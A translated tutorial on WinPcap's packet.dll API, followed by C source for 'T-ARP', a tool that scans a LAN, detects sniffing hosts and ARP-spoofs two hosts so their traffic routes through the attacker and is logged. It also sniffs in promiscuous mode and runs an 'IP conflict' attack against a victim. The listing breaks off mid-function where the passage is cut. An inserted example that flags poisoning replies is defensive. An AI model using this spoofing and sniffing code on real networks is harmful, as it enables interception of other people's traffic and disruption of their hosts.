Writing a multi-function ARP tool on top of the WinPcap driver

xiaoxiao2021-03-06  99

Contents:
1. WinPcap driver introduction
2. Packet.dll data structures and functions
3. T-ARP features and principles
4. T-ARP main code analysis
5. T-ARP source code

1. WinPcap driver introduction

WinPcap (Windows Packet Capture) is a free, public network access system for the Windows platform. (Editor's note: the WinPcap development package can be downloaded from (1) http://winpcap.polito.it/ or (2) the VC Knowledge Base toolbar.) The goal of the WinPcap project is to give Win32 applications access to the lower network layers. It provides the following capabilities:
1> capture raw datagrams, both those addressed to the local host and those exchanged between other hosts on a shared network segment;
2> filter out particular datagrams according to user-defined rules before they are handed to the application;
3> send raw datagrams on the network;
4> collect statistics on network traffic.

The main job of WinPcap is to send and receive raw datagrams independently of the host protocol stack (such as TCP/IP). In other words, WinPcap cannot block, filter or control the datagrams sent by other applications; it only sees the traffic that passes over the shared network. It therefore cannot be used for QoS scheduling or as a personal firewall.

At present WinPcap development targets Windows NT/2000/XP, mainly because only a small fraction of WinPcap users are on Windows 95/98/Me, and Microsoft has also abandoned Win9x development. The T-ARP program in this article is therefore also for NT/2000/XP users. The 9x design in WinPcap is in fact very similar to the NT one; the differences are in implementation details, for example 9x supports only ANSI strings while the NT line recommends Unicode.

This article discusses the functions provided by packet.dll, because they are sufficient for what this article needs.
If you have other special or more advanced requirements, WinPcap also provides a second dynamic link library, wpcap.dll. Although wpcap.dll depends on packet.dll, it offers a simpler, more direct and more powerful programming interface, for example for capturing datagrams, creating packet filters or dumping captured traffic to a file; for these tasks wpcap.dll gives you a safer implementation.

2. Packet.dll data structures and functions

One purpose of this article is to show how to use the WinPcap driver to write an ARP tool, so the relevant data structures and functions need to be introduced first; otherwise the code that follows will be hard to read. The related data structures are:
1. typedef struct _ADAPTER ADAPTER; // describes a network adapter
2. typedef struct _PACKET PACKET; // describes a group of network datagrams
3. typedef struct NetType NetType; // describes the network (link) type
4. typedef struct npf_if_addr npf_if_addr; // describes the IP address of a network adapter
5. struct bpf_hdr // header the driver prepends to every captured datagram
6. struct bpf_stat // statistics on the datagrams captured so far

Next, the functions used by T-ARP, all exported by packet.dll:
1> LPPACKET PacketAllocatePacket(void)
Returns a pointer to a _PACKET structure on success, otherwise NULL.

The returned structure is then passed to PacketReceivePacket() to receive network datagrams from the driver.
2> void PacketCloseAdapter(LPADAPTER lpAdapter)
Closes the adapter given in the parameter and frees the associated ADAPTER structure.
3> void PacketFreePacket(LPPACKET lpPacket)
Frees the _PACKET structure given in the parameter.
4> BOOLEAN PacketGetAdapterNames(PTSTR pStr, PULONG BufferSize)
Returns the list of available network adapters and their descriptions.
5> BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterName, npf_if_addr *buff, PLONG NEntries)
Returns the full address information of a network adapter. The npf_if_addr structure contains IPAddress (the IP address), SubnetMask (the subnet mask) and Broadcast (the broadcast address).
6> BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)
Returns the MAC (link) type of a network adapter. The NetType structure contains LinkSpeed and LinkType, where LinkType is one of: NdisMedium802_3: Ethernet (802.3); NdisMediumWan: WAN; NdisMedium802_5: Token Ring (802.5); NdisMediumFddi: FDDI; NdisMediumAtm: ATM; NdisMediumArcnet878_2: ARCNET (878.2).
7> BOOLEAN PacketGetStats(LPADAPTER AdapterObject, struct bpf_stat *s)
Returns statistics on the datagrams captured so far. The bpf_stat structure contains bs_recv, bs_drop, ps_ifdrop and bs_capt. bs_recv: the number of datagrams received by the adapter since the capture started, including those that were later dropped; bs_drop: the number of datagrams dropped, which happens when the driver's buffer is already full.
8> PCHAR PacketGetVersion()
Returns version information about the DLL.
9> void PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)
Initializes a _PACKET structure with a user-supplied buffer.
10> LPADAPTER PacketOpenAdapter(LPTSTR AdapterName)
Opens a network adapter.
11> BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject, LPPACKET lpPacket, BOOLEAN Sync)
Reads network datagrams and statistics from the NPF driver. The data in the receive buffer is laid out as a sequence of records, each padded to a word boundary: | bpf_hdr | data | padding | bpf_hdr | data | padding | ...
12> BOOLEAN PacketSendPacket(LPADAPTER AdapterObject, LPPACKET lpPacket, BOOLEAN Sync)
Sends one or more copies of a datagram.
13> BOOLEAN PacketSetBuff(LPADAPTER AdapterObject, int dim)
Sets the size of the kernel buffer used to capture datagrams.
14> BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject, ULONG Filter)
Sets the hardware filter applied to received datagrams.

Typical filter values are: NDIS_PACKET_TYPE_PROMISCUOUS: promiscuous mode, receive every datagram on the wire; NDIS_PACKET_TYPE_DIRECTED: receive only datagrams addressed to the local adapter; NDIS_PACKET_TYPE_BROADCAST: receive only broadcast datagrams; NDIS_PACKET_TYPE_MULTICAST: receive only multicast datagrams for groups the local adapter belongs to; NDIS_PACKET_TYPE_ALL_MULTICAST: receive all multicast datagrams; NDIS_PACKET_TYPE_ALL_LOCAL: receive all datagrams for the local host.
15> BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject, int nwrites)
Sets how many copies of a datagram PacketSendPacket() transmits.
16> BOOLEAN PacketSetReadTimeout(LPADAPTER AdapterObject, int timeout)
Sets the time after which a read returns even if no datagram has arrived.

These are the functions T-ARP calls; they cover most of packet.dll. To learn more about WinPcap, visit the project home page: http://winpcap.polito.it

3. T-ARP features and principles

Preparation:
1. Install the WinPcap driver; the newest version is WinPcap_3.0_alpha and the stable version is WinPcap_2.3.
2. Before using ARP spoofing, IP routing must be enabled by adding or modifying the registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1.

Options:
-m host scan: obtain the IP and MAC addresses of the live hosts in the local network;
-a anti-sniff scan: obtain the IP and MAC addresses of the hosts in the local network that are sniffing;
-s ARP spoof: spoof the two specified hosts in the local network so that they send the data meant for each other to the local host instead; network sniffing, if both spoofed hosts are the local host itself, in which case every datagram passing the local host's adapter is monitored;
IP conflict, if the two spoofed hosts are the same non-local host, in which case an IP conflict attack is carried out;
-r reset the spoofed hosts so that they return to normal operation.

Principle and implementation: whatever the option, the first step is to obtain the MAC address and the network settings of the local host. We send an ARP Request to the local host with a special sender IP address (112.112.112.112) and a made-up sender MAC; when the local host receives it, it answers with an ARP Reply, and from that reply we obtain the local host's MAC address. The related network settings are obtained with PacketGetNetInfoEx() and PacketGetNetType().

-m: an ARP Request is broadcast (destination MAC FF:FF:FF:FF:FF:FF) for every IP address in the specified range, using the local host's IP and MAC as the sender; every live host answers the local host with an ARP Reply, which yields the list of hosts currently alive.

Because many gateways restrict ARP Requests (a gateway will not answer an ARP Request whose sender IP is not an intranet address), and because sending ARP Requests with another intranet host's IP causes an IP conflict on that host whenever the MAC filled in does not match that IP, it is best to send the requests with your own IP and MAC address.

-a: an ARP Request is sent to every host in the specified IP range with the destination MAC set to the 31-bit pseudo-broadcast address FF:FF:FF:FF:FF:FE. A host that is sniffing answers with an ARP Reply, so a list of the sniffing hosts is obtained. A sniffing Windows 2000 system responds to the 16-bit pseudo-broadcast address (FF:FF:00:00:00:00); a sniffing Windows 95/98/Me system responds both to the 16-bit and to the 8-bit pseudo-broadcast address (FF:00:00:00:00:00); *nix systems react differently to the various pseudo-broadcast addresses. The 31-bit address is used here because most systems respond to it when sniffing, and under normal conditions no system responds to it. The reason the trick works is that an adapter which is not in promiscuous mode drops every frame whose destination is not its own MAC, the true broadcast address or a subscribed multicast group, so the bogus frame never reaches the protocol stack; in promiscuous mode the adapter passes every frame up, and on these systems the stack's own destination check inspects only part of the address, accepts the frame and answers the request. Treat the result as an indicator rather than proof: the exact behaviour depends on the operating system and driver, so a host that does not answer may still be sniffing.

-s (ARP spoof): it must be stressed that on some local networks (such as Ethernet) the transmission and reception of datagrams is based on the hardware address. This is the basis of our technique. First obtain the MAC addresses of the two specified hosts (call them A and B), then send an ARP Reply to host A whose sender IP address is B's IP address but whose sender MAC address is the local host's MAC address. Host A will then believe that host B's MAC address is the local host's MAC address, so the data A sends to B arrives at the local host. Similarly, an ARP Reply is sent to host B telling it that host A's MAC address is the local host's MAC address.
Hosts A and B now both resolve the other's IP address to the local host's MAC address, so the data they exchange first arrives at the local host; because IP routing was enabled on the local host, the system automatically forwards each datagram on to its true destination. Meanwhile every datagram they exchange can be monitored.
-s (network sniff): if both specified hosts are the local host, the adapter is put into promiscuous mode and all traffic passing the local host's adapter is monitored.
-s (IP conflict shock): if the two specified hosts are the same non-local host (say host C), ARP Replies are sent to host C whose sender IP address is C's own IP address but whose sender MAC address is the local host's MAC address, so host C finds that another host is using the same IP address as itself: that is the IP conflict attack. A non-XP system pops up an IP conflict dialog and an XP system shows a similar warning. Note, however, that host C's System event log records the MAC address of the local host as the conflicting host, so do not abuse this feature.
-r: while ARP spoofing is in effect, ARP Replies are sent to hosts A and B telling host A (B) that host B's (A's) MAC address is B's (A's) real MAC address, so A and B update their ARP caches and normal communication resumes.
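The frames described in this section, built and then read back the way T-ARP walks the | bpf_hdr | data | padding | layout returned by PacketReceivePacket() (function 11> above), as an added example that is not part of the original T-ARP source. It also shows the check a monitor on the victim segment would use to notice the -s spoof: an ARP Reply whose sender MAC contradicts an already known IP-to-MAC binding. All addresses are constructed for the example; the local struct bpf_hdr and Packet_WORDALIGN are assumed to match the WinPcap definitions so the code compiles without packet32.h, and the build_arp/append_record/scan_capture/demo_capture functions are this example's own names, not packet.dll calls.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>   /* htons/htonl/ntohl; on Windows include winsock2.h instead */

#define ETH_ARP     0x0806
#define ARP_REQUEST 1
#define ARP_REPLY   2

#pragma pack(push, 1)
typedef struct { uint8_t dst[6], src[6]; uint16_t type; } ethdr;           /* 14 bytes */
typedef struct {
    uint16_t hrd, pro; uint8_t hln, pln; uint16_t op;
    uint8_t sha[6]; uint32_t spa; uint8_t tha[6]; uint32_t tpa;            /* 28 bytes */
} arphdr;
#pragma pack(pop)

/* Local stand-in for WinPcap's struct bpf_hdr and Packet_WORDALIGN (assumption: same
   layout as packet32.h: timestamp, captured length, wire length, header length;
   records padded to a 4-byte boundary). */
struct bpf_hdr { uint32_t tv_sec, tv_usec, bh_caplen, bh_datalen; uint16_t bh_hdrlen; };
#define Packet_WORDALIGN(x) (((x) + 3) & ~(size_t)3)

/* A known IP-to-MAC binding, as a monitor would learn it from earlier replies. */
struct binding { uint32_t ip_host; uint8_t mac[6]; };

/* Build an Ethernet+ARP frame into buf and return its length (42 bytes). */
size_t build_arp(uint8_t *buf, uint16_t op, const uint8_t *eth_dst, const uint8_t *sha,
                 uint32_t spa_net, const uint8_t *tha, uint32_t tpa_net)
{
    ethdr eth; arphdr arp;
    memcpy(eth.dst, eth_dst, 6); memcpy(eth.src, sha, 6); eth.type = htons(ETH_ARP);
    arp.hrd = htons(1); arp.pro = htons(0x0800); arp.hln = 6; arp.pln = 4; arp.op = htons(op);
    memcpy(arp.sha, sha, 6); arp.spa = spa_net; memcpy(arp.tha, tha, 6); arp.tpa = tpa_net;
    memcpy(buf, &eth, sizeof eth); memcpy(buf + sizeof eth, &arp, sizeof arp);
    return sizeof eth + sizeof arp;
}

/* Append one frame as a | bpf_hdr | data | padding | record; returns the next offset. */
size_t append_record(uint8_t *cap, size_t off, const uint8_t *frame, size_t len)
{
    struct bpf_hdr h; memset(&h, 0, sizeof h);
    h.bh_caplen = h.bh_datalen = (uint32_t)len; h.bh_hdrlen = (uint16_t)sizeof h;
    memcpy(cap + off, &h, sizeof h); memcpy(cap + off + sizeof h, frame, len);
    return Packet_WORDALIGN(off + sizeof h + len);
}

/* Walk a receive buffer of `received` bytes record by record, count the ARP replies,
   and return how many carry a sender MAC that contradicts a known binding for the
   sender IP (the signature of a poisoning reply). A truncated record ends the walk
   instead of being read past the end of the buffer. */
int scan_capture(const uint8_t *cap, size_t received, const struct binding *known,
                 int nknown, int *replies)
{
    size_t off = 0; int poisoned = 0; *replies = 0;
    while (off + sizeof(struct bpf_hdr) <= received) {
        struct bpf_hdr h; memcpy(&h, cap + off, sizeof h);
        if (h.bh_hdrlen < sizeof h || off + h.bh_hdrlen + h.bh_caplen > received) break;
        const uint8_t *data = cap + off + h.bh_hdrlen;
        off = Packet_WORDALIGN(off + h.bh_hdrlen + h.bh_caplen);
        if (h.bh_caplen < sizeof(ethdr) + sizeof(arphdr)) continue;
        ethdr eth; arphdr arp;
        memcpy(&eth, data, sizeof eth); memcpy(&arp, data + sizeof eth, sizeof arp);
        if (eth.type != htons(ETH_ARP) || arp.op != htons(ARP_REPLY)) continue;
        (*replies)++;
        for (int i = 0; i < nknown; i++)
            if (known[i].ip_host == ntohl(arp.spa) && memcmp(known[i].mac, arp.sha, 6) != 0) {
                poisoned++; break;
            }
    }
    return poisoned;
}

/* Constructed scenario (all addresses made up): A = 10.0.0.2, B = 10.0.0.3 and the
   local (spoofing) host = 10.0.0.9. */
static const uint8_t MAC_A[6]  = {0x00,0x11,0x22,0x33,0x44,0x02};
static const uint8_t MAC_B[6]  = {0x00,0x11,0x22,0x33,0x44,0x03};
static const uint8_t MAC_ME[6] = {0x00,0x11,0x22,0x33,0x44,0x09};
const struct binding DEMO_KNOWN[2] = { {0x0A000002, {0x00,0x11,0x22,0x33,0x44,0x02}},
                                       {0x0A000003, {0x00,0x11,0x22,0x33,0x44,0x03}} };

/* Fill cap (at least 256 bytes) with three records and return the byte count:
   1) the getMine()-style probe: a request from bogus 112.112.112.112 / 82:82:82:82:82:82;
   2) B's legitimate reply to A;  3) the -s spoof "B is at MAC_ME", sent to A. */
size_t demo_capture(uint8_t *cap)
{
    static const uint8_t bcast[6] = {0xff,0xff,0xff,0xff,0xff,0xff};
    static const uint8_t bogus[6] = {0x82,0x82,0x82,0x82,0x82,0x82};
    static const uint8_t zero[6]  = {0};
    uint32_t ip_a = htonl(0x0A000002), ip_b = htonl(0x0A000003), ip_me = htonl(0x0A000009);
    uint8_t frame[64]; size_t off = 0, n;
    n = build_arp(frame, ARP_REQUEST, bcast, bogus, htonl(0x70707070), zero, ip_me);
    off = append_record(cap, off, frame, n);
    n = build_arp(frame, ARP_REPLY, MAC_A, MAC_B, ip_b, MAC_A, ip_a);
    off = append_record(cap, off, frame, n);
    n = build_arp(frame, ARP_REPLY, MAC_A, MAC_ME, ip_b, MAC_A, ip_a);   /* poisoning reply */
    off = append_record(cap, off, frame, n);
    return off;
}

int main(void)
{
    uint8_t cap[256]; int replies;
    size_t n = demo_capture(cap);
    int bad = scan_capture(cap, n, DEMO_KNOWN, 2, &replies);
    printf("%zu bytes, %d ARP replies, %d contradict a known binding\n", n, replies, bad);
    return 0;
}
```

The walk in scan_capture mirrors getData(): advance by bh_hdrlen to reach the frame, then by Packet_WORDALIGN(bh_caplen) to the next record. The one thing it adds over the original loop is the bounds check on bh_hdrlen and bh_caplen, which matters because a driver buffer is only as trustworthy as the code that filled it.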

4. T-ARP main code analysis

1> Custom functions:
int getMine() // sends an ARP Request asking for the local host's MAC address;
void getData(LPPACKET lp, int op) // classifies and processes the received datagrams;
DWORD WINAPI Sniff(LPVOID no) // puts the adapter into promiscuous mode and receives every datagram on the wire;
DWORD WINAPI SendMasr(LPVOID no) // sends ARP Requests asking for the MAC addresses of the specified IPs;
DWORD WINAPI SendSr(LPVOID no) // sends ARP Replies to carry out the ARP spoof, or to restore the hosts' ARP caches.

2> Main code:
printf("\nLibrary version: %s", PacketGetVersion()); // print the DLL version;
PacketGetAdapterNames((char *)AdapterName, &AdapterLength) // get the list of adapters and descriptions on the local host;
lpAdapter = PacketOpenAdapter(AdapterList[Open - 1]); // open the chosen adapter;
PacketGetNetType(lpAdapter, &ntype) // get the adapter's MAC type;
PacketGetNetInfoEx(AdapterList[Open - 1], &ipbuff, &npflen) // get the adapter's address information;
rthread = CreateThread(NULL, 0, Sniff, (LPVOID)&Opti, 0, &ThreadRId); // create a thread that listens for datagrams;
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) // put the adapter into promiscuous mode so that all traffic passing the local host can be listened to;
PacketSetBuff(lpAdapter, 500 * 1024) // set the kernel buffer to 500 * 1024 bytes;
PacketSetReadTimeout(lpAdapter, 1) // wait at most 1 millisecond for a datagram;
PacketReceivePacket(lpAdapter, lpPacketR, TRUE) // receive all datagrams once in promiscuous mode;
sthread = CreateThread(NULL, 0, SendMasr, (LPVOID)&Opti, 0, &ThreadSId);
sthread = CreateThread(NULL, 0, SendSr, (LPVOID)&Opti, 0, &ThreadSId); // create a thread that sends the specific ARP datagrams;
PacketSetNumWrites(lpAdapter, 2) // transmit each datagram twice;
PacketSendPacket(lpAdapter, lpPacketS, TRUE) // send the custom datagram;
WaitForSingleObject(sthread, INFINITE); // wait for the thread that sends the ARP datagrams;
PacketGetStats(lpAdapter, &stat) // get the adapter statistics.

5. T-ARP source code

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#include "packet32.h"
#include "ntddndis.h"

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "packet")

#define ETH_IP          0x0800
#define ETH_ARP         0x0806
#define ARP_REQUEST     0x0001
#define ARP_REPLY       0x0002
#define ARP_HARDWARE    0x0001
#define MAX_NUM_ADAPTER 10

#pragma pack(push, 1)
typedef struct ethdr
{
    unsigned char  eh_dst[6];    /* destination MAC */
    unsigned char  eh_src[6];    /* source MAC */
    unsigned short eh_type;      /* EtherType: ETH_IP or ETH_ARP */
} ETHDR, *PETHDR;

typedef struct arphdr
{
    unsigned short arp_hdr;      /* hardware type (1 = Ethernet) */
    unsigned short arp_pro;      /* protocol type (0x0800 = IP) */
    unsigned char  arp_hln;      /* hardware address length (6) */
    unsigned char  arp_pln;      /* protocol address length (4) */
    unsigned short arp_opt;      /* ARP_REQUEST or ARP_REPLY */
    unsigned char  arp_sha[6];   /* sender MAC */
    unsigned long  arp_spa;      /* sender IP */
    unsigned char  arp_tha[6];   /* target MAC */
    unsigned long  arp_tpa;      /* target IP */
} ARPHDR, *PARPHDR;

typedef struct iphdr
{
    unsigned char  h_lenver;
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;
    unsigned short checksum;
    unsigned int   sourceIP;
    unsigned int   destIP;
} IPHDR, *PIPHDR;
#pragma pack(pop)

LPADAPTER lpAdapter = 0;
LPPACKET  lpPacketR = NULL, lpPacketS = NULL;
ULONG     MyIP, FirstIP, SecondIP;              /* host byte order */
UCHAR     MMAC[6] = {0}, FMAC[6] = {0}, SMAC[6] = {0};   /* local, first and second host MACs */
BOOL      MM = FALSE, FM = FALSE, SM = FALSE;   /* which MACs have been learned */
FILE     *fp = NULL;
char      AdapterList[MAX_NUM_ADAPTER][1024];   /* Unicode adapter names, zero-filled */
char      msg[50];
LONG      num = 0;                              /* next offset into the scanned IP range */

void start()
{
    printf("T-ARP --- ARP Tools, by TOO2Y (??), 11-9-2002\n");
    printf("Homepage: www.safechina.net\n");
    printf("E-mail: Too2y@safechina.net\n");
    return;
}

void usage()
{
    printf("\nUsage: T-ARP [-m|-a|-s|-r] firstip secondip\n\n");
    printf("Option:\n");
    printf("-m MAC       Get the MAC address from firstip to secondip\n");
    printf("-a Antisniff Get the sniffing host from firstip to secondip\n");
    printf("-s Spoof     1> Spoof the host between firstip and secondip\n");
    printf("   Sniff     2> Sniff if firstip == secondip == your own IP\n");
    printf("   Shock     3> Shock if firstip == secondip != your own IP\n");
    printf("-r Reset     Reset the spoofed host work normally\n\n");
    printf("Attention:\n");
    printf("1> You must have installed the WinPcap_2.3 or WinPcap_3.0_alpha\n");
    printf("2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter == 0x1\n\n");
    return;
}

/* Send an ARP Request for our own IP from a bogus sender (82:82:82:82:82:82,
   112.112.112.112); the local stack answers with an ARP Reply that carries its real MAC. */
int getMine()
{
    char   sendbuf[1024];
    int    k;
    ETHDR  eth;
    ARPHDR arp;

    for (k = 0; k < 6; k++)
    {
        eth.eh_dst[k]  = 0xff;
        eth.eh_src[k]  = 0x82;
        arp.arp_sha[k] = 0x82;
        arp.arp_tha[k] = 0x00;
    }
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REQUEST);
    arp.arp_tpa = htonl(MyIP);
    arp.arp_spa = inet_addr("112.112.112.112");
    memset(sendbuf, 0, sizeof(sendbuf));
    memcpy(sendbuf, &eth, sizeof(eth));
    memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
    PacketInitPacket(lpPacketS, sendbuf, sizeof(eth) + sizeof(arp));
    if (PacketSendPacket(lpAdapter, lpPacketS, TRUE) == FALSE)
    {
        printf("PacketSendPacket in getMine Error: %d\n", GetLastError());
        return -1;
    }
    return 0;
}

/* Walk the receive buffer (| bpf_hdr | data | padding | ...) and process each frame
   according to the current option: log forwarded IP traffic, or learn MACs from ARP Replies. */
void getData(LPPACKET lp, int op)
{
    ULONG   ulBytesReceived, off, tlen, ulen, ulLines;
    ULONG   j, k;
    ETHDR  *eth;
    ARPHDR *arp;
    PIPHDR  ip;
    char   *buf, *pChar, *pLine, *base;
    struct bpf_hdr     *hdr;
    struct sockaddr_in  sin;

    ulBytesReceived = lp->ulBytesReceived;
    buf = (char *)lp->Buffer;
    off = 0;
    while (off < ulBytesReceived)
    {
        if (kbhit())
        {
            return;
        }
        hdr   = (struct bpf_hdr *)(buf + off);
        off  += hdr->bh_hdrlen;
        pChar = (char *)(buf + off);
        base  = pChar;
        off   = Packet_WORDALIGN(off + hdr->bh_caplen);
        eth   = (PETHDR)pChar;
        arp   = (PARPHDR)(pChar + sizeof(ETHDR));
        if (eth->eh_type == htons(ETH_IP))
        {
            ip = (PIPHDR)(pChar + sizeof(ETHDR));
            if (FM && SM && (op == 3))
            {
                /* Either traffic between the two spoofed hosts that reached our MAC
                   while being forwarded, or everything when we sniff ourselves. */
                if ((((ip->sourceIP != htonl(MyIP)) && (ip->destIP != htonl(MyIP))
                      && (memcmp(eth->eh_dst, MMAC, 6) == 0))
                     && ((ip->sourceIP == htonl(FirstIP)) || (ip->destIP == htonl(FirstIP))
                         || (ip->sourceIP == htonl(SecondIP)) || (ip->destIP == htonl(SecondIP))))
                    || ((FirstIP == MyIP) && (SecondIP == MyIP)))
                {
                    memset(msg, 0, sizeof(msg));
                    sin.sin_addr.s_addr = ip->sourceIP;
                    printf("[IP:] %16s ---> [IP:]", inet_ntoa(sin.sin_addr));
                    sprintf(msg, "%-15s", inet_ntoa(sin.sin_addr));
                    sin.sin_addr.s_addr = ip->destIP;
                    printf("%16s\n", inet_ntoa(sin.sin_addr));
                    sprintf(msg + strlen(msg), " -> %-15s", inet_ntoa(sin.sin_addr));
                    fseek(fp, -2, SEEK_CUR);
                    fwrite("\r\n\r\n\r\n", 6, 1, fp);
                    fwrite(msg, strlen(msg), 1, fp);
                    fwrite("\r\n", 2, 1, fp);
                    /* Hex + ASCII dump of the frame, 16 bytes per line */
                    tlen    = hdr->bh_caplen;
                    ulLines = (hdr->bh_caplen + 15) / 16;
                    for (k = 0; k < ulLines; k++)
                    {
                        pLine = pChar;
                        printf("%08lx: ", (unsigned long)(pChar - base));
                        ulen  = tlen;
                        ulen  = (ulen > 16) ? 16 : ulen;
                        tlen -= ulen;
                        for (j = 0; j < ulen; j++)
                            printf("%02x ", *(BYTE *)pChar++);
                        if (ulen < 16)
                            printf("%*s", (int)((16 - ulen) * 3), "");
                        pChar = pLine;
                        for (j = 0; j < ulen; j++)
                        {
                            printf("%c", isprint((unsigned char)*pChar) ? *pChar : '.');
                            fputc(isprint((unsigned char)*pChar) ? *pChar : '.', fp);
                            pChar++;
                        }
                        printf("\n");
                    }
                    printf("\n");
                    fwrite("\r\n", 2, 1, fp);
                }
            }
            continue;
        }
        else if ((eth->eh_type == htons(ETH_ARP)) && (arp->arp_opt == htons(ARP_REPLY)))
        {
            sin.sin_addr.s_addr = arp->arp_spa;
            if (sin.sin_addr.s_addr == htonl(MyIP))
            {
                /* The local stack's answer to the getMine() probe: our own MAC */
                memcpy(MMAC, eth->eh_src, 6);
                if (!MM)
                {
                    printf("\t");
                    for (k = 0; k < 5; k++)
                        printf("%.2X-", eth->eh_src[k]);
                    printf("%.2X\n", eth->eh_src[5]);
                    switch (op)
                    {
                    case 1:
                        printf("\n[MAC List:]");
                        break;
                    case 2:
                        printf("\n[Sniff Host:]");
                        break;
                    default:
                        break;
                    }
                }
                MM = TRUE;
            }
            if ((op == 1) || (op == 2))
            {
                printf("\n[IP:] %.16s\t[MAC:] ", inet_ntoa(sin.sin_addr));
                for (k = 0; k < 5; k++)
                    printf("%.2X-", eth->eh_src[k]);
                printf("%.2X", eth->eh_src[5]);
            }
            else if (((op == 3) || (op == 4)) && (!FM || !SM))
            {
                if (arp->arp_spa == htonl(FirstIP))
                {
                    memcpy(FMAC, eth->eh_src, 6);
                    FM = TRUE;
                }
                if (arp->arp_spa == htonl(SecondIP))
                {
                    memcpy(SMAC, eth->eh_src, 6);
                    SM = TRUE;
                }
            }
        }
    }
    return;
}

/* Receive thread: promiscuous mode, then hand every read buffer to getData() until a key is pressed. */
DWORD WINAPI Sniff(LPVOID no)
{
    int  option = *(int *)no;
    char recvbuf[1024 * 250];

    if (PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE)
    {
        printf("Warning: unable to set the adapter to promiscuous mode\n");
    }
    if (PacketSetBuff(lpAdapter, 500 * 1024) == FALSE)
    {
        printf("PacketSetBuff Error: %d\n", GetLastError());
        return 1;
    }
    if (PacketSetReadTimeout(lpAdapter, 1) == FALSE)
    {
        printf("Warning: unable to set the timeout\n");
    }
    if ((lpPacketR = PacketAllocatePacket()) == NULL)
    {
        printf("PacketAllocatePacket Receive Error: %d\n", GetLastError());
        return 1;
    }
    PacketInitPacket(lpPacketR, (char *)recvbuf, sizeof(recvbuf));
    while (!kbhit())
    {
        if (PacketReceivePacket(lpAdapter, lpPacketR, TRUE) == FALSE)
        {
            return 1;
        }
        getData(lpPacketR, option);
    }
    return 0;
}

/* Send ARP Requests with our real IP/MAC: one per thread for the next IP of the range
   (-m, -a), or two for FirstIP and SecondIP (-s, -r). */
DWORD WINAPI SendMasr(LPVOID no)
{
    int    fun = *(int *)no;
    int    k, stimes;
    char   sendbuf[1024];
    ETHDR  eth;
    ARPHDR arp;

    if (fun < 1 || fun > 4)
    {
        return 1;
    }
    else
    {
        for (k = 0; k < 6; k++)
        {
            eth.eh_dst[k]  = 0xff;
            arp.arp_tha[k] = 0x00;
        }
        if (fun == 2)
            eth.eh_dst[5] = 0xfe;    /* -a: 31-bit pseudo-broadcast FF:FF:FF:FF:FF:FE */
    }
    memcpy(eth.eh_src, MMAC, 6);
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REQUEST);
    arp.arp_spa = htonl(MyIP);
    memcpy(arp.arp_sha, MMAC, 6);
    if (fun == 1 || fun == 2)
        stimes = 1;
    else
        stimes = 2;
    for (k = 0; k < stimes; k++)
    {
        if (stimes == 1)
        {
            /* several SendMasr threads run at once, so take the next offset atomically */
            arp.arp_tpa = htonl(FirstIP + (InterlockedIncrement(&num) - 1));
        }
        else
        {
            switch (k)
            {
            case 0:
                arp.arp_tpa = htonl(FirstIP);
                break;
            case 1:
                arp.arp_tpa = htonl(SecondIP);
                break;
            default:
                break;
            }
        }
        memset(sendbuf, 0, sizeof(sendbuf));
        memcpy(sendbuf, &eth, sizeof(eth));
        memcpy(sendbuf + sizeof(eth), &arp, sizeof(arp));
        PacketInitPacket(lpPacketS, sendbuf, sizeof(eth) + sizeof(arp));
        if (PacketSendPacket(lpAdapter, lpPacketS, TRUE) == FALSE)
        {
            printf("PacketSendPacket in SendMasr Error: %d\n", GetLastError());
            return 1;
        }
    }
    return 0;
}

/* Send the ARP Replies: with our MAC as sender to spoof (-s, repeated until a key is
   pressed), or with the hosts' real MACs once to restore their caches (-r). */
DWORD WINAPI SendSr(LPVOID no)
{
    int    fun = *(int *)no;
    int    j, k;
    char   sendbuf[1024];
    struct sockaddr_in fsin, ssin;
    BOOL   stimes = FALSE;      /* TRUE: keep spoofing; FALSE: single reset round */
    ETHDR  eth;
    ARPHDR arp;

    fsin.sin_addr.s_addr = htonl(FirstIP);
    ssin.sin_addr.s_addr = htonl(SecondIP);
    eth.eh_type = htons(ETH_ARP);
    arp.arp_hdr = htons(ARP_HARDWARE);
    arp.arp_pro = htons(ETH_IP);
    arp.arp_hln = 6;
    arp.arp_pln = 4;
    arp.arp_opt = htons(ARP_REPLY);
    if (fun == 3)
    {
        if (MM)
        {
            if ((FirstIP == MyIP) && (SecondIP == MyIP))
            {
                FM = TRUE;
                SM = TRUE;
                memcpy(FMAC, MMAC, 6);
                memcpy(SMAC, MMAC, 6);
            }
            else if (!FM || !SM)
            {
                printf("\nNot get enough data\n");
                return 1;
            }
            for (j = 0; j < 2; j++)
            {
                if (j == 0)
                {
                    printf("\nSpoofing %.16s: ", inet_ntoa(fsin.sin_addr));
                    printf("%.16s ==> ", inet_ntoa(ssin.sin_addr));
                }
                else
                {
                    printf("Spoofing %.16s: ", inet_ntoa(ssin.sin_addr));
                    printf("%.16s ==> ", inet_ntoa(fsin.sin_addr));
                }
                for (k = 0; k < 5; k++)
